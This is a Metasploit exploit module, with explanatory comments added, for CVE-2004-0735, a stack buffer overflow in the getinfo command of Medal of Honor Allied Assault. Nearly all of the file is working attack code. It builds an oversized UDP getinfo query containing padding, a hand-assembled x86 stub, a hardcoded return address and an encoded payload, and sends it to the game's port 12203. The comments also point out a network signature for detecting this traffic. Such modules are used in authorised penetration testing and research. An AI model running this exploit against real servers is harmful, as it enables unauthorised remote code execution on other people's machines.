##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Framework rank used to order this module relative to other exploits.
  Rank = GreatRanking

  # Supplies connect_udp, udp_sock and disconnect_udp used in #exploit.
  include Msf::Exploit::Remote::Udp

  # Registers the module metadata (name, references, payload constraints,
  # per-target constants) and the default RPORT option.
  #
  # @param info [Hash] metadata supplied by the framework loader, merged
  #   through update_info before being passed to the superclass
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Medal of Honor Allied Assault getinfo Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in the getinfo
          command of Medal Of Honor Allied Assault.
        },
        'Author' => [ 'Jacopo Cervini' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2004-0735'],
          [ 'OSVDB', '8061' ],
          [ 'EDB', '357'],
          [ 'BID', '10743'],
        ],
        'Privileged' => false,
        'Payload' => {
          # payload.encoded appended in #exploit must fit in this many bytes
          'Space' => 512,
          # the encoder is required to keep NUL out of the encoded payload
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          # Rets[0] is the length of the 'B' padding built in #exploit;
          # Rets[1] is the 32-bit value packed little-endian after the stub.
          ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
        ],
        'DisclosureDate' => '2004-07-17',
        'DefaultTarget' => 0,
        # Reliability, stability and side-effect notes have not been
        # assessed for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Default UDP port the getinfo query is sent to.
    register_options(
      [
        Opt::RPORT(12203)
      ]
    )
  end

  # Sends one oversized "getinfo" query to RPORT in a single UDP datagram.
  #
  # Datagram layout, in order: the fixed "\xff\xff\xff\xff\x02getinfo "
  # prefix, Rets[0] bytes of 'B' padding, a hand-assembled x86 stub (each
  # line's trailing comment names the instruction it encodes), the Rets[1]
  # value packed little-endian, "\r\n\r\n", 32 NOPs from make_nops and the
  # encoded payload. With the default target, buf is 520 bytes before the
  # CRLF/NOP/payload tail (sum of the literal lengths below).
  #
  # Detection note: the prefix and the padding are module constants, so a
  # getinfo query of this size and shape on the game port is a stable
  # signature for this traffic.
  def exploit
    connect_udp

    # We should convert this to metasm - Patrick
    buf = 'B' * target['Rets'][0]
    buf << "\x68\x76\x76\x76\x76" * 9 # PUSH 76767676 x 9
    buf << "\x68\x7f\x7f\x7f\x7f" # PUSH 7F7F7F7F
    buf << "\x57" # PUSH EDI
    buf << "\x58" # POP EAX
    buf << "\x32\x64\x24\x24" # XOR AH,BYTE PTR SS:[ESP+24]
    buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
    buf << "\x48" * 150 # DEC EAX x 150
    buf << "\x50\x50" # PUSH EAX x 2
    buf << "\x53" # PUSH EBX
    buf << "\x58" # POP EAX
    buf << "\x51" # PUSH ECX
    buf << "\x32\x24\x24" # XOR AH,BYTE PTR SS:[ESP]
    buf << "\x6a\x7f" # PUSH 7F
    buf << "\x5e" # POP ESI
    buf << "\x46" * 37 # INC ESI
    buf << "\x56" * 10 # PUSH ESI
    buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24]
    buf << "\x49\x49" # DEC ECX
    buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX
    buf << "\x58" * 11 # POP EAX
    buf << "\x42" * 66 # filler
    buf << "\x3c" * 4 # filler
    buf << "\x42" * 48 # filler
    buf << [ target['Rets'][1] ].pack('V') # 'V' = 32-bit little-endian

    # Protocol framing: four 0xff bytes, a 0x02 byte, then the command name.
    req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
    req << "\r\n\r\n" + make_nops(32) + payload.encoded

    # Everything goes out as one datagram; nothing is read back.
    udp_sock.put(req)

    handler
    # NOTE(review): not in an ensure block, so an exception raised by put or
    # handler leaves the UDP socket open.
    disconnect_udp
  end
end